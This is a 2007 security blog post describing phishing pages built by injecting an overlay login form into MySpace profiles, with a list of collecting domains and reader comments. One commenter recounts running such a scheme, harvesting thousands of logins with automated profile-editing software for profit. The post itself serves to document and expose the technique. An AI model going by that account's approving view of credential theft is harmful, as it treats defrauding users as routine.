Cenzic 232 Patent
Paid Advertising
web application security lab
« Where is/was RSnake?
Do We Need a Security Industry »

Style Injection Phishing

This is certainly not new, but I happened across an interesting link to a bunch of phishing sites built into MySpace. Instead of being a normal phishing site that rely on JavaScript injection or email, the MySpace phishing sites rely only on injecting a form that overlays over the page itself. The URL to find these is a simple Google dork.

At the time of writing there were 56 phishing sites on MySpace. Obviously not huge as a percentage, but it’s scary that there are any at all. It’s unclear what they want to do with these urls, however, I spent a few minutes mapping out the URLs used by the phishers:

  • 5 x hur.be
  • 4 x willgle.com
  • 2 x r3voluti0n.com
  • 1 x m3rm.org
  • 1 x spaceadder.info
  • 1 x coolton.dajoob.com
  • 1 x www.profilespider.com
  • 1 x www.itfailz.net
  • 1 x artexstudios.com
  • 1 x members.lycos.co.uk
  • 1 x login-myspace.logindotspace.com
  • 1 x www.googleidols.com

So only 20 were working/alive as I checked. I was able to find one example of the PHP script used (almost all of them were written in PHP). This one was simply wildly mis-configured. A number of them appeared to be old and were hobbled by MySpace who changed the URL to a “..” which had the effect of breaking the script, but the pages were still messed up (as if MySpace pages aren’t already messed up enough to begin with). Pretty ugly.

This entry was posted on Saturday, May 5th, 2007 at 8:06 pm and is filed under Webappsec, Phishing. Responses are currently closed, but you can trackback from your own site.

8 Responses to “Style Injection Phishing”

  1. Awesome AnDrEw Says:
    May 6th, 2007 at 7:34 am

    It’s essentially the same as the SEO trick of using a DIV overlay on an entire page to redirect users’ clicks. I just can’t fathom that people wouldn’t realize that they’ve been scammed when they continually “login” only to constantly receive the same message. In a way it’s also quite similar to the example script you created where the element follows the mouse so no matter where a click is presented it’s also intercepted. I’m not sure how their overlay was setup size-wise, because I’m on the Wii and can’t view the source, but it doesn’t cover the entire page properly on the Wii’s Opera browser.

  2. RSnake Says:
    May 6th, 2007 at 10:08 am

    I didn’t see an error message, if you look at the source that I included, it simply does a re-direct as an output, nothing more. If you don’t have JS turned on you just see a blank page.

  3. Awesome AnDrEw Says:
    May 6th, 2007 at 10:25 am

    Sorry, I was referring to the first Google search result I got. I did laugh when I looked at the script you posted, because I do know who wrote that exact script though, and know where it originates from, but it’d be “breaking rules 1 & 2″ if I said where it came from.

  4. RSnake Says:
    May 6th, 2007 at 11:12 am

    I don’t think it matters, that script is a) not technically interesting and b) non-functional in its current state.

  5. Awesome AnDrEw Says:
    May 6th, 2007 at 12:06 pm

    That’s what happens when basic phishing scripts fall into the hands of people with no understanding of how to use them. All though to most of us this isn’t anything new or exciting this script has been floating around a certain site for the past 2 months off and on. It was in a Winrar file with specific instructions on how to use it, but a lot of the kids who downloaded it aren’t technically inclined.

  6. lithium Says:
    May 7th, 2007 at 12:42 pm

    Aha, I noticed my site that got suspended in September made it on your list. Interesting! (logindotspace.com)

    Well it’s not that the people using the script are not technically inclined it’s the fact that they were using automated programs to edit a persons profile and update the profile layout.

    Which made it considerably easier then manually editing 2k profiles to get 10k to 12k logins in return. Rather using a software created for myspace pishers/spammers and so forth a program called “MyChanger” is used in all spamming aspects.

    Made the job so much easier, Although myspace had a hell of alot of errors back then which would cause the scripts to not display correctly if you had not noticed all the %%%% signs on the page, The layout didn’t fit the screen etc..Although a fair ammount did turn out alright, 30% never and was bugged out like the ones displayed in the google dork.

    This year every spammer and pisher has moved on due to lack of profit comming from myspace. It’s not worth the time, We used to make 2k a day through CPA deals last year. Now you’d be lucky to make $100-$200 a day.

  7. RSnake Says:
    May 7th, 2007 at 1:31 pm

    I wasn’t saying the sites were up, sorry if that was confusing… I was only saying that the page that was pointing to them was still functional. It would be easy enough for someone to re-reg that domain.

  8. Andy Says:
    July 29th, 2009 at 12:16 pm

    So, I think i have downloaded something that has done a php script and has overlayed the page i want to visit with a fake to make me enter my details and then intercept them [Habbo.co.uk] What do i do to get rid of this and get the original page back. I dont no much about this subject so sorry if i sound stupid, feel free to correct me :)

    Thanks Andy